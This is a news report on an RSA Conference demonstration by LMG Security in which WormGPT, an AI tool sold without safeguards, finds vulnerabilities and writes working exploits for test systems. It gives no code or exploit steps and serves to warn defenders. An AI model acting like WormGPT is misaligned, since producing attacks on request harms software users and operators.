A hot potato: A new wave of AI tools designed without ethical safeguards is empowering hackers to identify and exploit software vulnerabilities faster than ever before. As these “evil AI” platforms evolve rapidly, cybersecurity experts warn that traditional defenses will struggle to keep pace.
On a recent morning at the annual RSA Conference in San Francisco, a packed room at Moscone Center had gathered for what was billed as a technical exploration of artificial intelligence’s role in modern hacking.
The session, led by Sherri Davidoff and Matt Durrin of LMG Security, promised more than just theory; it would offer a rare, live demonstration of so-called “evil AI” in action, a topic that has rapidly moved from cyberpunk fiction to real-world concern.
Davidoff, LMG Security’s founder and CEO, set the stage with a sober reminder of the ever-present threat from software vulnerabilities. But it was Durrin, the firm’s Director of Training and Research, who quickly shifted the tone, reports Alaina Yee, senior editor at PCWorld.
He introduced the concept of “evil AI” – artificial intelligence tools designed without ethical guardrails, capable of identifying and exploiting software flaws before defenders can react.
“What if hackers utilize their malevolent AI tools, which lack safeguards, to detect vulnerabilities before we have the opportunity to address them?” Durrin asked the audience, previewing the unsettling demonstrations to come.
The team’s journey to acquire one of these rogue AIs, such as GhostGPT and DevilGPT, usually ended in frustration or discomfort. Finally, their persistence paid off when they tracked down WormGPT – a tool highlighted in a post by Brian Krebs – through Telegram channels for $50.
As Durrin explained, WormGPT is essentially ChatGPT stripped of its ethical constraints. It will answer any question, no matter how destructive or illegal the request. However, the presenters emphasized that the true threat lies not in the tool’s existence but in its capabilities.
The LMG Security team began by testing an older version of WormGPT on DotProject, an open-source project management platform. The AI correctly identified a SQL vulnerability and proposed a basic exploit, though it failed to produce a working attack – likely because it couldn’t process the entire codebase.
A newer version of WormGPT was then tasked with analyzing the infamous Log4j vulnerability. This time, the AI not only found the flaw but provided enough information that, as Davidoff observed, “an intermediate hacker” could use it to craft an exploit.
The real shock came with the latest iteration: WormGPT offered step-by-step instructions, complete with code tailored to the test server, and those instructions worked flawlessly.
To push the limits further, the team simulated a vulnerable Magento e-commerce platform. WormGPT detected a complex two-part exploit that evaded detection by mainstream security tools like SonarQube and even ChatGPT itself. During the live demonstration, the rogue AI offered a comprehensive hacking guide, unprompted and with alarming speed.
As the session drew to a close, Davidoff reflected on the rapid evolution of these malicious AI tools.
“I’m a little nervous about where we will [be] with hacker tools in six months because you can clearly see the progress that has been made over the past year,” she said. The audience’s uneasy silence echoed the sentiment, Yee wrote.
Image credit: PCWorld, LMG Security
Source link